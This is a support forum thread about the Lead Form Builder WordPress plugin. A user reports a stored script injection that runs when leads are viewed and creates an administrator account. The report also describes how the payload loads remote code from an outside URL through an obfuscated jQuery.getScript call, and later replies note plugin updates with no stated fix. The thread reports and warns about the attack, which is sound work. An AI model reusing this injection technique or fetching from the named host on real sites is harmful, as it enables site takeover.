• To improve performance and better customer
    experience we are maintaining our server.
    If you are getting login issues then
    please send an email at "themehunk@gmail.com"
  • Your query is valuable for us, you can post your query any time.
    We are ON in week days. You will get instant support in our working hours.
    We are little slow in non-working hours, but you will get response in maximum 24 hours.
    Our working timing is
    [10:00 AM (IST) - 7:00 PM (IST)]
    [6:30 AM (CET)- 3:30 PM (CET)]
    [12:30 AM (EST) - 9:30 AM (EST)]

    Login Rules
    1. Premium users can login directly using aMember credentials, Created at the time of purchase.
    2. Free users can re-register to access forum using this link : Register Here.

WARNING JQuery script injection - PLEASE FIX ASAP

teox99

Pro Member
Pro
#1
you can inject dangerous script in form text data, you must prevent users from inserting scripting tags!!!!
i found this in email saved in Database (check the attached file) when you click on "view leads" the script can create a new user with administration level!!!
the script use jQuery.getScript(String.fromCharCode(...) to call an external url https://2b5.pw/i.js
PLEASE FIX IT AS SOON AS POSSIBLE!!!
 

Attachments

deva

Pro Member
Pro
#2
Lead Form Builder Pro (and free version Lead Form Builder) was updated from version 1.7.6 to 1.7.7 circa 14 April 2022, about 10 days after your post
Not sure of version change content / benefit, so not sure if injection threat has been resolved.
Suggest you test and evaluate latest 1.7.7 version.
 

deva

Pro Member
Pro
#3
Lead Form Builder Pro updated again to v 1.7.8 on 25 April 2022.
No mention of JQuery script injection:

Version 1.7.8
  • Unlimited block for gutenberg plugin added.
  • elementor issue fixd.
Version 1.7.7
  • Widget error fixd.